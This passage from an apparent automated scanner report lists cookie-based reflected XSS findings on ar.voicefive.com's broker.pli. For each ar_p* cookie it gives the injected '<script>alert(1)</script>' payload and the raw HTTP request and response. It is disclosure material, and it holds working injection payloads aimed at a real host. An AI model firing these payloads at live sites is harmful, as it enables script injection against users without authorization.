HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
t Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&ecf8e<script>alert(1)</script>a7ed8ad7ab7', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:0
...[SNIP]...

1.489. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 5576b<script>alert(1)</script>42a950a151e was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&5576b<script>alert(1)</script>42a950a151e; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
"ar_s_p84053757": '1->1297606675', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&5576b<script>alert(1)</script>42a950a151e', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:
...[SNIP]...

1.490. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 8cbf1<script>alert(1)</script>5e54f48ca7b was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&8cbf1<script>alert(1)</script>5e54f48ca7b; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&8cbf1<script>alert(1)</script>5e54f48ca7b', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&
...[SNIP]...

1.491. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload 64e2e<script>alert(1)</script>5bd065759a6 was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&64e2e<script>alert(1)</script>5bd065759a6; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
itExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&64e2e<script>alert(1)</script>5bd065759a6', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.492. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84068139 cookie is copied into the HTML document as plain text between tags. The payload fc20d<script>alert(1)</script>d332a9dc906 was submitted in the ar_p84068139 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&fc20d<script>alert(1)</script>d332a9dc906; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&fc20d<script>alert(1)</script>d332a9dc906', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.
...[SNIP]...

1.493. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84532700 cookie is copied into the HTML document as plain text between tags. The payload e039c<script>alert(1)</script>e6c63100fcf was submitted in the ar_p84532700 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&e039c<script>alert(1)</script>e6c63100fcf; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&e039c<script>alert(1)</script>e6c63100fcf', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&', "ar_s_p84053757": '1->
...[SNIP]...

1.494. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload ecc7f<script>alert(1)</script>d67fa7f6f9b was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
